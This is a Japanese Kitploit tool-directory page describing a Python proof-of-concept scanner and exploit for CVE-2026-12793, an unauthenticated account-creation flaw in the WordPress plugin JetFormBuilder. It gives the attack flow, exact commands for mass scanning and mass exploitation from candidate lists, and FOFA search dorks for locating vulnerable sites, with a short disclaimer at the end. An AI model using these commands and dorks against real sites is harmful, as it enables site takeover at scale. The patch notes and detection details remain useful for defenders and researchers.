Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-12793 — Python製のPoCスキャナーおよびエクスプロイト。CVE-2026-12793(JetFormBuilder <=3.6.2における認証不要の権限昇格で、WordPress管理者アカウントを作成する脆弱性)に対応。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-12793
特権昇格偵察脆弱性スキャナー脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubmurrez/cve-2026-12793

CVE-2026-12793

11時間13分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Python製のPoCスキャナーおよびエクスプロイト。CVE-2026-12793(JetFormBuilder <=3.6.2における認証不要の権限昇格で、WordPress管理者アカウントを作成する脆弱性)に対応。

リポジトリを見る

CVE-2026-12793 — JetFormBuilder 未認証の権限昇格

WordPress プラグイン JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock) における CVE-2026-12793 の概念実証スキャナーおよびエクスプロイト。

CVECVE-2026-12793
プラグインjetformbuilder
影響を受けるバージョン≤ 3.6.2
修正バージョン3.6.2.1+
CVSS9.8 Critical
認証未認証
CWECWE-269 — 不適切な権限管理
研究者daroo (Wordfence)

脆弱性

このプラグインは、_jet_engine_booking_form_id が公開された jet-form-builder カスタム投稿タイプを参照していることを確認せずに、参照された投稿のブロックコンテンツをフォームスキーマとして読み込み、投稿送信後のアクションを実行します。

未認証の攻撃者が細工された AJAX リクエストを送信することで、Register User アクション (wp_insert_user) をトリガーし、新しい WordPress アカウントを作成できます。対象のフォームが昇格されたロール (例: administrator) で誤設定されている場合、サイト全体の乗っ取りにつながります。

攻撃フロー

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

パッチ (3.6.2.1)

  • Block_Helper::is_valid_form_post() — 公開された jet-form-builder CPT のみ受け入れ
  • Form_Handler::set_form_id() は無効なフォーム ID を拒否
  • SSR 検証の強化 (wp_insert_user / wp_update_user をコールバックとしてブロック)

要件

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

使用方法

単一ターゲット — チェック

root@kitploit:~
python poc.py -u https://target.example --mode check

一括スキャン

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

入力形式: 1 行につき 1 ドメイン/URL、FOFA CSV (host,domain)、または前回の実行で生成された candidates.jsonl。

エクスプロイト (単一ターゲット)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

候補からの一括エクスプロイト

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

オプション

出力ファイル

ファイル内容
hits.txt脆弱な / エクスプロイトされたターゲット URL

候補エントリの例

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

自動検出されたフィールド名はヒューリスティックです。エクスプロイト前に必ず確認し、--fields で上書きしてください。

検出 / FOFA dorks

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

バージョンチェック:

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

Stable tag: ≤ 3.6.2 を探してください。

参考文献

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみ に提供されています。コンピュータシステムへの不正アクセスは違法です。作者は悪用に対して一切の責任を負いません。

ライセンス

MIT

ツールをダウンロード
フラグ説明
-u, --url単一ターゲット URL
--listターゲットリストファイル
--modecheck (デフォルト) または exploit
--form-id既知の JetFormBuilder フォーム投稿 ID
--page-urlフォームを埋め込むページ (リファラ)、例: /register/
--fieldsフィールドマップ: login=x,email=y,password=z
--pathsフォームを探してクロールする追加パス
--username / --email / --passwordエクスプロイト用の認証情報 (省略時はランダム)
--verify送信後に wp-login.php 経由でアカウントを検証
-j, --threadsワーカースレッド数 (デフォルト: 20)
--timeoutHTTP タイムアウト (秒) (デフォルト: 20)
--proxyHTTP(S) プロキシ URL
--output完全な JSONL ログ (デフォルト: cve_2026_12793_results.jsonl)
--vuln-listヒットリスト (デフォルト: hits.txt)
--candidates-list候補 JSONL (デフォルト: candidates.jsonl)
-q, --quiet進捗出力のみ
candidates.jsonl到達可能な Register User プローブを持つターゲット (form_id、page_url、fields)
cve_2026_12793_results.jsonlターゲットごとの完全な JSON 結果